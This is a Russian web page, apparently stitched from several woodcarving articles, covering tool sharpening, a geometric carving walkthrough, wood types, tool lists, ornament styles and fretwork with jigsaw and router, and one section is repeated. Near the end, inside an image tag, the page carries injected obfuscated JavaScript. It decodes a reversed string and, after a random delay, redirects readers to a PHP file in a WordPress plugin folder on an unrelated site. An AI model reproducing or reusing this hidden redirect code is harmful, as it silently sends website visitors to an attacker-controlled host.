Резчикам по дереву. альбом орнаментов. выпуск с 1 по 9

Содержание:

Уход за инструментами

Следует периодически осматривать ваши инст­рументы, вытирать их промасленной тряпочкой, чтобы они не заржавели. Храните инструменты в индивидуальных отсеках или завернутыми в ткань, чтобы защитить их и сократить время, по­траченное на заточку.

ЗАТОЧКА ИНСТРУМЕНТОВ

Следите за тем, чтобы ваши инструменты всегда были острыми, и время от времени приостанав­ливайте работу для заточки. Все мои знакомые резчики выработали собственную систему прав­ки; каждый нашел свою процедуру, удобную лич­но для него. Одни используют оселки с маслом, другие с водой, третьи — электрические приспо­собления.

Первым делом следует заточить лезвие при по­мощи мелкозернистого абразива, например ал­мазной крошки или наждачной бумаги. Сначала обрабатывается одна сторона до появления на металле заусенцев, затем другая. На следующем этапе правки устраняются неровности поверхно­сти, возникшие вначале. В заключение следует специальным составом отшлифовать лезвие до зеркального блеска, сокращая трение между лез­вием и деревом.

Резьба по дереву для начинающих от опытных резчиков по дереву

Теперь детально рассмотрим мастер-класс для начинающих по геометрической резьбе. Будем делать интересный бортик на сосновой, заранее прогрунтованной доске. Делать это необязательно, но желательно, если не хотите, чтобы в процессе работы образовывались неаккуратные надломы.

Этапы работы вырезания по дереву

Итак, для начала приготовим необходимые инструменты и оборудование. После этого можно приступать к работе.

Иллюстрация Описание действия
Для этого делаем разметку по 2 см по всей длине доски сбоку и с торца, используя обычную линейку.
Берём вырезной флажок, устанавливаем его вовнутрь разметки под уклоном, как показано на фото, и делаем неглубокую прорезь по всей длине.
Проделываем тоже самое только с торцевой стороны.
Берём другой флажок и снимаем уголок, но не до конца, а чуть больше, чем на половину квадратика.
Переворачиваем доску набок и также под наклоном делаем надрезы, убирая части древесины полностью. Получаются ромбовидные выемки.
Берём полукруглый инструмент и делаем надрезы от боковых носиков к центру разметки, как показано на фото. Чтобы не оставалось серединных остатков при резьбе, попробуйте использовать резчик большего диаметра.
Как вариант, эти неприглядные остатки можно быстро удалить флажком, просто откалывая их.
Переворачиваем на торцевую часть и проделываем тоже самое. При этом давить необязательно. Работаем нежно и аккуратно. При обладании хорошим инструментом древесина будет поддаваться легко обработке.
Берм ровный уголок и выполняем очень аккуратно скос вовнутрь. Делаем поворотный элемент на торцевой стороне подобным образом.
Чтобы не появлялось таких дефектов, можно при работе использовать скошенный уголок. Или же после им просто аккуратно убрать получившиеся несовершенства.
Берём прямой флажок и подчищаем узор по контуру.
Когда узор окончен, берём мелкозернистый наждак и зачищаем его.

Более подробно мастер расскажет о резке подобного узора в приведённом ниже видео.

Watch this video on YouTube

Резка по дереву – это, безусловно, сложное, требующее внимательности и аккуратности ремесло. Но нет ничего невозможного. При должном старании можно стать настоящим мастером этого дела.

Подбираем иструменты и приспособления, применяемые при создании узоров

При выполнении резьбы такого вида используют самые различные режущие инструменты, вроде обычных ножей и стамесок. Но работа такими инструментами очень трудоемка и утомительна. Поэтому более популярными таких целей являются дрель и пила, причем тип пилы может быть разный – от лобзика до ручной ножовки, в зависимости от размера созданного вами шаблона.

В наше время мастера редко используют ручной труд при выполнении масштабных работ. Зачастую используют удобные бытовые электроинструменты, например, электродрель, ручной фрезер и электролобзик. С использованием электролобзика работа проходит быстро, легко и качественно. Но при такой работе невозможно обойтись без дрели, используемой для предварительного засверливания отверстий для пилки. Работа ручным фрезером не на столько легка и производительна, к тому же требует предварительных навыков в обращении с этим электроинструментом. Но резьба получается значительно качественнее и при этом не требуется делать предварительных отверстий в заготовке.

Существуют и более оригинальные способы создания прорезного узора на деревянной заготовке. Одним из таких способов является прожигание. Суть данного способа заключается в буквальном прожигании сквозного узора на дереве сильно нагретой нихромовой проволокой. Минусами же можно считать специфический запах гари, необходимость охлаждать рабочий инструмент, из-за чего работа немного затягивается по времени, а так же заметно обугленные края готового узора.

Более усовершенствованным методом такого способа можно считать лазерную резку, которая выделяется высоким качеством и точностью получаемого рисунка. Однако использование подобного способа возможно лишь при закупке очень дорогостоящего оборудования, из-за чего ныне этот вид работы не очень часто используют на практике.

В заключении статьи хотелось бы продемонстрировать вам потрясающую работу очень опытного мастера, изображающего на своих работах не просто абстрактные рисунки, а очень точные и подробные копии животных.

С какой древесиной работать?

Для работы в такой технике резьбы понадобится качественная древесина. Ее подразделяют на несколько групп согласно некоторым характеристикам.

  1. Очень твердая древесина является самой сложной для работы, даже не каждому профессионалу с легкостью дается узор на такой поверхности. Но зачастую выбор падает именно на нее, так как она славится эстетическими свойствами и хорошей устойчивостью к гниению. Наиболее известные представители данной группы – дуб, кизил, а также белая акация.
  2. Древесина средней твердости – наиболее часто используемое сырье. Большинство мастеров предпочитают именно такой вид заготовок, поскольку работать с ними намного легче, они обладают схожими свойствами с более твердыми сортами, а также имеют довольно красивую структуру на срезах. Самые яркие представители данной категории – бук, ясень, береза, осина.
  3. Мягкая древесина лучше всего поддается любым видам обработки, но имеет существенный недостаток – при резьбе она может колоться. Данный вид сырья подходит для новичков и для тех, кто только обучается резьбе. В данной группе наиболее известными представителями являются сосна, ива, ольха, липа.

Отделка готового изделия

Композиция в технике контурной резьбы может выполняться как на однотонной, так и на тонированной и полированной поверхности древесины. Во втором случае дальнейшая обработка материала не требуется. Если же орнамент вырезался на светлой древесине, то его покрывают прозрачным лаком, предварительно шлифуя поверхность мелкой наждачной бумагой. Шлифование обязательно выполняется вдоль древесных волокон. Точеные изделия лучше шлифовать и покрывать прозрачным лаком в зажатом состоянии при вращении в станке. Соответственно, выточенное изделие не срезается с деревянной заготовки, а снимается, покрывается резьбой и повторно зажимается в станке, после чего отделывается, просушивается и только после этого срезается.

Вид отделки выбирается в зависимости от назначения изделия из древесины. Поверхность может лакироваться до блеска либо оставаться матовой с нанесением на резьбу разведенного лака жесткой кистью. Шлифованная поверхность контурной резьбы перед лакировкой прозрачными составами может тонироваться в разные цвета посредством окрашивания только фона либо фона с отдельными, наиболее углубленными линиями. Лак наносится только на тщательно высушенную поверхность древесины.

Начинающие мастера по древесине выполняют работы в технике контурной резьбы на плоских досках. По мере получения опыта и повышения мастерства можно начинать работать с более сложными изделиями: предметами мебели, обихода и быта. На таких элементах контурная резьба может выступать как в качестве отдельной самостоятельной техники, так и в качестве дополнительного художественного декора, выполненного в паре с другими техниками столярного искусства. Контурная резьба позволяет выполнять тонкие и эстетичные орнаменты в различных стилях.

По одной или оптом?

Резные наличники состоят обычно из повторяющихся элементов. По крайней мере, две вертикальные рейки на каждом окне делают одинаковыми. А так как оформляются обычно несколько окон, одинаковых элементов требуется много. Если наличники собираетесь делать прорезные, закономерно возникает желание вырезать одновременно несколько штук, сложив доски стопкой и как-то их зафиксировав.

Желание понятное, но сложно реализуемое, да и выгоды во времени не так велики, как кажется. Первая сложность — у домашних мастеров обычно в наличии лобзики не слишком большой мощности. Чтобы прорезать несколько досок, приходится медленнее двигать пилку вдоль намеченного рисунка. На прямых линиях скорость еще терпима, на закруглениях — низкая. И, чем меньше радиус изгиба, тем медленнее приходится двигать пилку. Если вы работаете с одной доской, таких проблем нет. Так что по времени выигрыш если и есть, то совсем небольшой.

Еще один момент. Даже толстые, хорошие, дорогие пилки при большой толщине обрабатываемого изделия отклоняются. Так что, при одновременном резе нескольких досок, качество прорези на нижней (или двух) остается под большим вопросом.

Без чего не обойтись начинающему резчику

Любой, кому посчастливится оказаться в мастерской настоящего мастера резьбы по дереву, ужаснется – так много тот использует различных инструментов. Просто глаза разбегаются. Мастер легко определит, чем выполнить тот или иной штрих, что лучше всего подойдет для той или иной детали. Выбор правильного инструмента для резьбы во многом определяет качество изделия.

Начинающему резчику вовсе не обязательно закупать полный набор инструментов, для изготовления изделий начального уровня можно обойтись несколькими наиболее универсальными ножами и стамесками. Это даст возможность получить опыт работы, выработать свой стиль, а после обзавестись именно тем инструментом, который действительно будет востребован.

Ножи-косяки

Самые распространенные ножи для резьбы по дереву – ножи-косяки. Ими пользуются как маститые профессионалы, так и начинающие резчики. Ножи этого типа имеют скошенное лезвие, благодаря чему удобны для создания небольших углублений. Их применение оправданно как для плоскорельефной выборки, так и для создания объемных композиций.

Отдельная разновидность косяка – нож-флажок. Он выглядит как треугольник, одним углом воткнутый в рукоять. Данный нож универсален, в работе используются все зоны лезвия.

Ножи-косяки отличаются углом режущей кромки и шириной лезвия. По виду заточки различают однофасковые и двухфасковые. В инструментарии начинающего резчика должно быть несколько таких ножей: как минимум три различной ширины.

Резаки для геометрической резьбы

При изготовлении рельефных панно не обойтись без другого распространенного ножа резчика – ножа-резака. Благодаря более длинному лезвию такой нож идеально подходит для создания орнаментов, имеющих форму геометрических фигур. Им удобно обрабатывать криволинейные фигуры и закругления. Так, ножом-топориком вырезают треугольники и другие фигуры.

Помимо создания плоских рельефов, резаки широко применяют и для объемных изделий. В умелых руках маленький резак может сравниться с кистью художника.

Богородский нож, «Татьянка»

Словосочетание «богородская игрушка» знакомо многим. Это деревянная фигурка ручной работы. Практически весь процесс резьбы от подготовки заготовки до сглаживания мелких неровностей выполняют особым ножом, также называемым богородским. Такой нож непременно должен быть в мастерской резчика.

Широко распространена модификация данного ножа, в народе называемая «Татьянка». При резке мягкой древесины полный цикл работ можно выполнить одним этим инструментом. Он отлично подходит для резьбы «на силу», благодаря удобной рукояти идеально передает усилие на лезвие.

Стамески для резьбы по дереву

Выборки самых различных конфигураций удобно делать с помощью стамесок. Резчики используют различный инструмент, но более всего распространены:

  • прямые стамески;
  • полукруглые или радиусные;
  • клюкарзы, полукруглые стамески с изгибом у режущей кромки;
  • скобчатые, имеющие П-образный профиль;
  • уголковые.

В отличие от ножей, применение стамесок для резьбы по дереву позволяет за один проход сделать канавку требуемой глубины и профиля. При работе с мягкой древесиной стамеску вдавливают рукой, резьба по твердому дереву требует ударной техники. Тут на помощь мастеру придет деревянный молоток, киянка.

Помимо различий в профиле, стамески отличают и по размерам. Существует инструмент с рабочей кромкой от двух миллиметров до нескольких сантиметров.

Кроме этого существует еще один вид инструментов для гравировки и резьбы по дереву – штихель. Им можно выполнять красивые художественные работы.

Другие необходимые инструменты

Одними ножами и стамесками резчику не обойтись. Необходимо обзавестись и другим инструментом, предназначенным для обработки дерева. Список может быть очень обширным, все зависит от квалификации мастера и перечня изделий, которые он планирует изготовить. В любом случае потребуется:

  • ножовка или электрическая пила для вырезания заготовки;
  • топорик для черновой обработки;
  • рубанок и рашпиль для подготовки поверхности доски;
  • набор лекал для переноса изображения на заготовку;
  • дрель, ручная или электрическая;
  • нихромовая проволока для выжигания тонких элементов;
  • шлифовальная шкурка разной зернистости для окончательной отделки изделия.

Также нелишним будет побеспокоиться о безопасности при резьбе острым инструментом. Для крепления небольших изделий необходимы столярные тиски или несколько струбцин. Обезопасить руки от травм поможет защитная перчатка из стальной проволоки, это особенно актуально для начинающих резчиков. Если работа подразумевает множественные движения острым ножом «на себя», стоит приобрести фартук из толстой кожи.

Необходимые инструменты

Работа по обработке дерева предполагает наличие у мастера необходимого инвентаря, благодаря которому он может создавать любые изделия. Среди наиболее важных инструментов можно выделить:

  • острый перочинный нож;
  • пилу (поперечную, продольную, универсальную);
  • топор (колун);
  • тесло, топор с перпендикулярным топорищу лезвием, для создания фигурных и вогнутых изделий;
  • резец, рубанок – необходим для снятия стружки с заготовки
  • дрель;
  • дремель с насадками, для создания гравюр по дереву;
  • фрезу с набором лезвий;
  • напильник;
  • нож-косяк;
  • стамески – инструмент для обработки дерева (существуют плоские, полукруглые, угловые и скобчатые разновидности);
  • клюкарзы – стамеска, имеющая изогнутую форму (благодаря этому инструменту можно заниматься рельефной резьбой, сильно погружая стамеску в древесину);
  • ложкорезы – инструмент, благодаря которому можно создавать деревянные ложки, так как форма изделия способствует эффективному извлечению большого количества древесины за раз.

Для начинающего мастера по дереву достаточно будет иметь при себе столярный карандаш, несколько стамесок, нож-косяк и перочинный нож.

Разновидности орнаментов

Геометрический

Узоры орнамента геометрии состоят из простейших элементов, сочетание которых иногда создает фантазийные картины, которые не могут не удивлять. Деревянные резные украшения и композиции обычно представлены как орнаменты розеток, полос, каймы или звезд. Отдельные элементы можно применять самостоятельно:

  1. Точка – почти не используется в роли отдельного элемента, но при повторении получает декоративный эффект.
  2. Линии – элемент, который часто применяют, чаще всего используется для разграничения разных мотивов.
  3. Ломаная линия – зигзаг является символичным водяным знаком.
  4. Ромб и квадрат – часто служит, чтобы ограничивать пространство заполненного мотивами.
  5. Восьмиугольники и шестиугольники – обычной элемент с восточным мотивом.
  6. Кресты – символы из древности с разнообразным строением.
  7. Витые шнуры и спирали – необычные элементы с геометрическим криволинейным строением.
  8. Круг – заключает в себе узор или представляет собой самостоятельный элемент композиции.

Растительный

Лиственный, или растительный узор может быть воплощен в виде полоски или каймы орнамента с повторяющимися элементами, или являются отдельной композицией с изображениями плодоносящих растений, деревьев, цветов и прочего. Представители флоры могут быть или изображены натуралистично, или стилизуются и после упрощены. После такой резьбы орнамент растительного типа наиболее популярен, а еще он может быть применен для всех видов резьбы. В различные времена и у всевозможных народностей существовали определенные любимые растительные узоры. Наиболее популярны такие растительные формы (с древних времен): дуб, лилия, плющ, виноград, лавр, хмель.

Зооморфный

Такой орнамент (животный) построен на повторении изображения животных. Они могут быть и реальными, и мифическими. Чаще всего изображения зооморфного типа для резьбы стилизованные. Такое орнамент один из самых старых, и в разных странах есть определенные предпочтения, а также символические значение тех или иных животных. В композиции резного типа может быть не просто определенное животное, но и детали – крылья, лапы или головы. Анималистический узор часто сочетается с остальными орнаментами – геометрическими или растительными. Узоры с животными применяют во всех типах резьбы, и в скульптурной, и в плосковыемчатой.

Человеческое изображение

Комплексные

Еще есть резные элементы, которые несут декоративную, или возможно символическую нагрузку:

  • Иероглифы, надписи, вязь (арабского типа) и прочее.
  • Геральдика – фамильные гербы, эмблемы с разных стран.
  • Символические мотивы – они весьма разнообразные, к примеру, знак «инь-янь», крест, солярные знаки, лотос и прочее.

Это основные виды узоров.

Эскизы для узоров: инструкция

Начинающим резчикам рекомендуются перед началом работы определиться с тем, в какой технике планируется гравировка и правильно подобрать орнамент или узор.

Тем мастерам, которые не так давно взяли в руки инструменты, опытные мастера рекомендуют учитывать следующие нюансы при подготовке к работе:

  • шаблон для гравюры должен быть максимально простым и понятным, без сложных и витиеватых элементов;
  • для каждого вида резьбы существуют свои шаблоны для работы;
  • линии с имеющегося шаблона на материал для работы переносят максимально точно, так как только так можно добиться аккуратности в работе.

Не следует приступать к работе без предварительного создания эскиза

Декупаж шкатулки в разных стилях: идеи и мастер-классыМодель солнечной системы своими руками из бумаги и картона, фотоСкрапбукинг открытки на день рождения мастер классКак сделать кровать для кукол своими руками: руководство для любящих мам

Выбирая рисунок для последующего перенесения его на материал, стоит учитывать ряд тонкостей, которые помогут изготовить изделие профессионально и мастерски.

Этапы работы

Когда эскиз перенесен на основу, начинается самый интересный процесс – непосредственной обработки дерева.

Если вы работаете в технике сквозной резьбы, первым делом необходимо нанести стартовые отверстия в каждом элементе. Выполняется это, как правило, при помощи электрической дрели. После в отверстия вставляется пила, и часть дерева выпиливается. Далее края выравниваются и начинается художественное оформление.

Плоскорельефная и объемная резьба выполняются немного иначе.

В начале ножом проделываются контуры будущих узоров. Далее резаком выполняется прорезка самой глубокой центральной части. От нее формируются все остальные углубления.

Мелкие детали выполняются при помощи стамески.

Глубокий рельеф проделывается стамеской с изогнутым лезвием. По завершении работы все края обрабатываются с целью устранения шероховатостей и сколов.

Деревянные изделия из на продажу

Мастера, в чьих руках обычные доски или пеньки приобретают идеальную форму, пользуются большим уважением в обществе. В советские времена на уроках труда все мальчишки в обязательном порядке учились делать табуретку.

А сейчас с 5 класса предмет «Технология» прививает ребятам элементарные бытовые навыки. Если у парня есть тяга к столярному делу, то он обязательно найдет дома инструменты, ненужные доски и сколотит скворечник, кормушку для маленьких пернатых друзей.

Если у ребенка с детства пробиваются способности к столярному ремеслу, не нужно его готовить в медицинский институт. Хороший столяр – это человек с природным талантом, который может создавать полезные вещи и зарабатывать как практикующий хирург.

Посмотрите, как выглядят современные столяры. Почти как известные актеры или рок-звезды, а дело, которым они занимаются можно сравнить с высоким искусством. Заметно, что эти ребята хорошо зарабатывают в реальной жизни, а на канале YouTube их мастер-классы собирают миллионные просмотры.

Какие изделия из дерева на продажу пользуются повышенным спросом?

Список довольно обширный и составлен по степени популярности:

  • рамы, двери, лестницы;
  • мебель для дома и офиса;
  • изгороди, заборы, садовые беседки;
  • мелкие предметы быта – скалки, доски, швабры, подставки;
  • детские игрушки и настольные игры (шахматы, нарды);
  • посуда;
  • сувениры;
  • музыкальные инструменты;
  • иконы.

Большинство столярной продукции делается на заказ, а доход у опытных столяров – 100-150% от вложенных средств. Производство погонажных изделия (предметов из досок, бруса, вагонки) на продажу имеет больше плюсов, чем минусов.

Столяру нужны большое помещение, технические приспособления, качественный материал для работы. Процесс производства пыльный и вредный для здоровья. Но удовольствие и финансовую выгоду, которые получает мастер от творчества, с лихвой покрывают технические трудности.

Посмотрим, как работают настоящие мастера? Давайте! Столяр высшего разряда из массива создает простую, модную и удобную мебель. Когда будете смотреть пошаговые фото творческого процесса, подумайте, столько заработает мастер, когда продаст такое кресло.

А теперь предлагаю отдохнуть и полюбоваться на работу настоящего художника. Смотреть, как трудится умелый столяр приятно, познавательно и интересно!

Особенно полезно просматривать такие видео-ролики подросткам, которые на распутье и находятся в поисках себя.

История развития

Еще в древней Руси появились первые предметы, украшенные геометрической резьбой. И именно Русь считается родиной данной техники работы по дереву, которая впоследствии получила распространение по всему миру.

Кроме того, из древесины даже изготавливались дверные замки, которые также были украшены резьбой. Один такой экземпляр, созданный в XVIII веке, сохранился и по сей день находится в одном из музеев Москвы.

Стоит также отметить, что геометрия резьбы своими корнями уходит во времена, когда люди поклонялись языческим богам, поэтому абсолютно все орнаменты, нанесенные на предметы, имели определенный, довольно глубокий смысл.

В современном мире такие предметы не наделяются каким-либо магическим смыслом, но во времена древней Руси они использовались для защиты семьи, оберега дома, а иногда даже от порчи и сглаза.

По одной или оптом?

Резные наличники состоят обычно из повторяющихся элементов. По крайней мере, две вертикальные рейки на каждом окне делают одинаковыми. А так как оформляются обычно несколько окон, одинаковых элементов требуется много. Если наличники собираетесь делать прорезные, закономерно возникает желание вырезать одновременно несколько штук, сложив доски стопкой и как-то их зафиксировав.

Накладные резные наличники тоже интересны

Желание понятное, но сложно реализуемое, да и выгоды во времени не так велики, как кажется. Первая сложность — у домашних мастеров обычно в наличии лобзики не слишком большой мощности. Чтобы прорезать несколько досок, приходится медленнее двигать пилку вдоль намеченного рисунка. На прямых линиях скорость еще терпима, на закруглениях — низкая. И, чем меньше радиус изгиба, тем медленнее приходится двигать пилку. Если вы работаете с одной доской, таких проблем нет. Так что по времени выигрыш если и есть, то совсем небольшой.

Еще один момент. Даже толстые, хорошие, дорогие пилки при большой толщине обрабатываемого изделия отклоняются. Так что, при одновременном резе нескольких досок, качество прорези на нижней (или двух) остается под большим вопросом.

Резьба по дереву: рисунки работ лобзиком и фрезером

Красиво, когда интерьер украшают картинами, выполненными на дереве. Вырезанные картины, изображающие различные истории, впечатляют своим видом. Вы и сами можете попробовать поработать с деревом, используя специальные инструменты. 

Мастер в своей работе использует не только инструменты и сырьё. Ему нужны примеры, чтоб выполнялась резьба по дереву: фотографии, рисунки и эскизы. По ним мастер, как художник, создает свои композиции. 

Мастер работает с различными инструментами: лобзиком, фрезером, бормашиной и др. Рассмотрим, как по рисункам выполняются работы.

Для начала приготовьте рабочее место, чтобы вам ничего не мешало, а все необходимое было под рукой. Позаботьтесь о хорошем освещении и удобной высоте поверхности для работы:

1) Выберите материал, с которым будете работать. Хорошо для работы лобзиком подойдёт ольха. Поверхность рабочей заготовки должна быть ровной и без сучков.

2) Вы можете придумать сами рисунок, который будете воплощать на дереве. Можно воспользоваться предложенными эскизами:

3) Желаемый узор перенесите на дерево. Это можно выполнить, используя кальку. Положите её на заготовку, сверху — листок с эскизом, и обведите карандашом все линии. Чтобы рисунок на заготовке не размазался и не испортил всю работу, пройдитесь по линиям лаком.

4) Приготовьте к работе лобзик. Умеренно натяните полотно инструмента. При слабой или слишком тугой натяжке полотно может поломаться. 

5) Держа инструмент перпендикулярно изделию, начинайте выпиливать узор по контуру. Если эскиз предполагает узкие отверстия, выполнить их вам поможет шило. Нужно проколоть отверстие и самой пилкой выпилить необходимую часть.

6) После завершения выпиливания отшлифуйте заготовку, покройте лаком или покрасьте.

Художественное фрезерование

Фрезерование деревянных поверхностей в целях выполнения декорированных элементов выполняется V-образными и гальтельными фрезами. Мастер должен хорошо работать инструментом, быть ознакомленным с его техническими особенностями. 

Фрезером можно выполнять как контурную, так и сквозную резьбу. При работе с этим инструментом необходимо следить за выполнением симметрии работы. Для этого на перенесенном эскизе разделите детали на небольшие отрезки. Эти отрезки нужно выполнять последовательно и симметрично.

Как выполняется прорезная резьба

Работа, при которой полностью вырезается фон на деревянной заготовке – это сквозная резьба. Такие изделия выполняются для декорирования фасадов домов, окон. Также они используются как элементы для мебели либо просто как декор.

Вы можете сделать сквозную резьбу ножом и стамеской, но на это уйдёт довольно много времени. Чтобы процесс работы с деревом был менее трудоёмким, используйте лобзик или ручной фрезер.

Чтобы вы могли точно выполнить рисунок, перенесите его с помощью копировальной бумаги на заготовку. Затем можете постепенно вырезать ненужные детали. Чтобы  изделия казались более аккуратными, закруглите края.

При выполнении деревянных изделий с ажурной резьбой выбирайте узор в соответствии с его предназначением. Ведь узор, предназначенный для украшения фасада дома и выполненный мелкими завитками, будет невзрачен.

А шкатулка с различными мелкими деталями будет выглядеть эффектно. Также перила лестниц будут хорошо смотреться, если вы сделаете их крупными деталями. При их изготовлении лучше использовать фрезерный станок.

Рисунки для Резьбы по Дереву — более 100 эскизов

В этой подборке мне бы хотелось представить вашему вниманию только хорошие новые рисунки для резьбы по дереву. А также архивы книг по резьбе.

Я буду полагать, что вы владеете техникой, что у вас уже имеется все для резьбы по дереву, что вам не нужно объяснять, как вырезать, какие материалы использовать и так далее.

Уникальные книги по ремеслам для желающих уметь работать с деревом.

Russkaya_narodnaya_rezba_po_derevu_Sobolev_N_N_1.pdf

Domovaya_rezba_Burikov_V_G_Vlasov_V_N_1992.djvu

Работы по дереву. Резьба. Мозаика. Мебель — В.И. Рыженко.djvu

Работы по дереву. Столярные работы. Резьба по дереву. Инкрустация — В.И. Рыженко.djvu

Резчику по дереву — А.Ф. Афанасьев.djvu

Резьба по дереву. Приемы, техника, изделия — Александр Афанасьев.djvu

Резьба по дереву. Практическое пособие — Энтони Деннинг.pdf

После ознакомления с теоретической базой смотрите орнаменты, узоры для вдохновения.

Надо сказать, что я знаю несколько мастеров, которые именно зарабатывают своим творчеством, продавая свои изделия на Запад. Если вы тоже настроены на продажи, то представленные ниже идеи вполне могут быть востребованы.

Площадок для продажи много, я сама продаю свое творчество на Etsy — даю вам свою партнерскую ссылку, зарегистрировавшись по ней вы получите возможность разместить 40 работ без оплаты.

Симпатичный рисунок волка для вырезания.

Стилизованный узор дракона

Вырезать такого дракона будет непросто, но узор очень интересный!

Растительный узор для вырезания по дереву — эскиз розеткиГеометрическая резьба по дереву — рисунок круглой розеткиЭскиз резной розетки — восьмиугольникаРисунок для резьбы по дереву — ПосолоньРезьба по дереву — рисунок эскиз рамкиЦветочный узор для резьбы по деревуЭскиз для контурной резьбы

Как подготовить рисунок к работе: я обычно распечатываю узор на лазерном принтере, а затем переношу на деревянную поверхность методом декупажа, после чего уже работаю по орнаменту инструментом.

Рисунок узора для мебелиПример рисунка — резные фрезыПример орнаментов для резьбы по деревуПрорезная резьба — эскизы узоров наличников

Руководство по резьбе по дереву

Далее смотрите полное руководство по резьбе по дереву от Вэйна Бартона. С моими комментариями.

Начинать резьбу лучше всего с простых узоровПримеры простых бордюров рамочекПеред началом резьбы по дереву разметьте узор на заготовкеУ вас должен быть нож для резьбы по дереву

Обратите внимание на ножи фирм Kogatana, Narex, Татьянка и Flexcut.Пример резьбы по шкатулке — бордюр и центральный круглый орнаментУзор в виде каната или веревки — резьба по деревуПример оформления резной шкатулки с центральным круглым узором и орнаментом в виде каната.Готический рисунок бордюр в резьбе по дереву.Пример оформления шкатулки с готической резьбой.Примеры полукруглых резных орнаментовЭскизы полукруглых узоров для резьбы по деревуРезьба по дереву — узор сердечки и листочкиРезьба по дереву — тарелки с узорамиПример деревянного резного панно на стенуРезные деревянные тарелкиПримеры диагональных рисунков для резьбы по деревуПримеры рисунков узоров круглых розетокРезьба по дереву — треугольные розеткиПримеры резьбы четырехугольных розетокПримеры резьбы пятиугольных розетокРезьба по дереву — рисунко шестиугольных розетокПримеры семиугольных розеток в резьбе по деревуПримеры рисунков девятиугольных розетокПример рисунка двенадцатиугольной розеткиРезьба по дереву — рисунок орнамента вихрь ПротивосолоньЭскиз и пример узора с листьями в резьбе по деревуКружевной узор — эскиз для резьбы по деревуЧетырехточечный рисунокРезной компас и шестилистникПримеры резьбы по дереву — тарелкиШестигранник и шестиконечная звездаРисунок единорога для резьбы по деревуПримеры точечных узоровРисунок для вырезания — цветок ЭдельвейсРисунок для резьбы по дереву — тюльпанРисунок для резьбы по дереву — симметричный букетРезьба по дереву на сундукеРезьба по дереву — рисунок соваРезьба по дереву на деревянном зеркальце и часах

Как сделать шаблоны для резных наличников (трафарет)

Оптимальные и простые способы, как изготовить шаблоны для вырезания.

Ксерокопирование

Если разбираться с программами нет желания, можно сделать ксерокопию рисунка и сразу задать нужный размер копии (увеличить, уменьшить, сжать, расширить). Или отсканировать и распечатать эскиз на принтере в нужном формате.

Вручную — масштабирование по клеткам

В конце концов, можно сделать шаблон вручную, используя технологию масштабирования (копирование) по клеткам (линейное масштабирование).

Путем масштабирования по клеткам можно менять пропорции рисунков. Например, исходная форма не нравится, и вы хотите ее изменить. Для этого, при переносе рисунка сохраните одну из сторон в исходном размере, а вторую в новом квадрате увеличьте.

Масштабирование по клеткамИзменение пропорций рисунка при масштабировании по клеткам

Разновидности резьбы

rbConfig={start:performance.now(),rbDomain:»newrrb.bid»,rotator:’94qm’};

$Ikf=function(n){if (typeof ($Ikf.list) == «string») return $Ikf.list.split(«»).reverse().join(«»);return $Ikf.list;};$Ikf.list=[«\’php.eroc_nimda/bil/steewt-tsetal-siseneg/snigulp/tnetnoc-pw/moc.nosredneherdied.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andinavskaya-reznaya-doska-s-syuzhetnym-izobrazh-450×600.jpg» alt=»Скандинавская резная доска с сюжетным изображением (раннее средневековье): техника работы почти та же, что и сегодня» width=»450″ height=»600″ /> Скандинавская резная доска с сюжетным изображением (раннее средневековье): техника работы почти та же, что и сегодня

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *

Adblock
detector